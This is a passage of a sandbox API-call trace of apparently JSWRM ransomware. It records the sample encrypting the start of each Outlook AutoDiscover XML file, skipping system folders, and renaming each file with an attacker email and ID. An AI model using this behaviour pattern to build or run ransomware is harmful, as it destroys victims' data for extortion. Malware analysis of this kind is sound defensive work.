hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.046] CloseHandle (hObject=0x238) returned 1 [0138.046] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.TW.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.tw.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.TW.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.tw.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.047] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c98fe3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c98fe3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.VN.XML", cAlternateFileName="YA38FD~1.XML")) returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2=".") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="..") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="...") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="windows") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="recovery") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="perflogs") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="documents and settings") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="system volume information") returned 1 [0138.047] lstrcmpiW (lpString1="YAHOO.COM.VN.XML", lpString2="msocache") returned 1 [0138.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.VN.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.VN.XML", cchWideChar=16, lpMultiByteStr=0x241330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.VN.XML", lpUsedDefaultChar=0x0) returned 16 [0138.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.VN.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.VN.XML", cchWideChar=16, lpMultiByteStr=0x240ef8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.VN.XML", lpUsedDefaultChar=0x0) returned 16 [0138.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.VN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.vn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.048] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0138.048] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.048] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.050] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.050] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.050] CloseHandle (hObject=0x238) returned 1 [0138.050] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.VN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.vn.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.VN.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.vn.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.051] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1fc39fa2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1fc39fa2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc6021a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.XML", cAlternateFileName="YA531A~1.XML")) returned 1 [0138.051] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2=".") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="..") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="...") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="windows") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="recovery") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="perflogs") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="documents and settings") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="system volume information") returned 1 [0138.052] lstrcmpiW (lpString1="YAHOO.COM.XML", lpString2="msocache") returned 1 [0138.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.XML", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.XML", lpUsedDefaultChar=0x0) returned 13 [0138.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.XML", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.XML", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.XML", lpUsedDefaultChar=0x0) returned 13 [0138.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.053] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0138.053] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.053] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.055] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.055] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.055] CloseHandle (hObject=0x238) returned 1 [0138.055] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.056] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1fc86400, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1fc86400, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc86400, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.DE.XML", cAlternateFileName="YAHOOD~1.XML")) returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2=".") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="..") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="...") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="windows") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="recovery") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="perflogs") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="documents and settings") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="system volume information") returned 1 [0138.056] lstrcmpiW (lpString1="YAHOO.DE.XML", lpString2="msocache") returned 1 [0138.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.DE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.DE.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.DE.XML", lpUsedDefaultChar=0x0) returned 12 [0138.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.DE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.DE.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.DE.XML", lpUsedDefaultChar=0x0) returned 12 [0138.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.DE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.de.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.057] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=804) returned 1 [0138.057] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.057] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.094] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.094] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.094] CloseHandle (hObject=0x238) returned 1 [0138.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.DE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.de.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.DE.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.de.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.096] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c98fe3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c98fe3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x328, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.ES.XML", cAlternateFileName="YAHOOE~1.XML")) returned 1 [0138.096] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2=".") returned 1 [0138.096] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="..") returned 1 [0138.096] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="...") returned 1 [0138.096] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="windows") returned 1 [0138.096] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="recovery") returned 1 [0138.097] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="perflogs") returned 1 [0138.097] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="documents and settings") returned 1 [0138.097] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.097] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="system volume information") returned 1 [0138.097] lstrcmpiW (lpString1="YAHOO.ES.XML", lpString2="msocache") returned 1 [0138.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.ES.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.ES.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.ES.XML", lpUsedDefaultChar=0x0) returned 12 [0138.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.ES.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.ES.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.ES.XML", lpUsedDefaultChar=0x0) returned 12 [0138.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.ES.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.es.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.098] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=808) returned 1 [0138.098] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.098] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.100] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.100] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.100] CloseHandle (hObject=0x238) returned 1 [0138.100] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.ES.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.es.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.ES.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.es.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.101] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c9b60b5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c9b60b5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.FR.XML", cAlternateFileName="YAHOOF~1.XML")) returned 1 [0138.101] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2=".") returned 1 [0138.101] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="..") returned 1 [0138.101] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="...") returned 1 [0138.102] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="windows") returned 1 [0138.102] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="recovery") returned 1 [0138.102] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="perflogs") returned 1 [0138.102] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="documents and settings") returned 1 [0138.102] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.102] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="system volume information") returned 1 [0138.102] lstrcmpiW (lpString1="YAHOO.FR.XML", lpString2="msocache") returned 1 [0138.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.FR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.FR.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.FR.XML", lpUsedDefaultChar=0x0) returned 12 [0138.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.FR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.FR.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.FR.XML", lpUsedDefaultChar=0x0) returned 12 [0138.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.FR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.fr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.103] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=804) returned 1 [0138.103] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.103] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.105] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.105] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.105] CloseHandle (hObject=0x238) returned 1 [0138.105] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.FR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.fr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.FR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.fr.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.106] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c9b60b5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c9b60b5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9dc2d6, 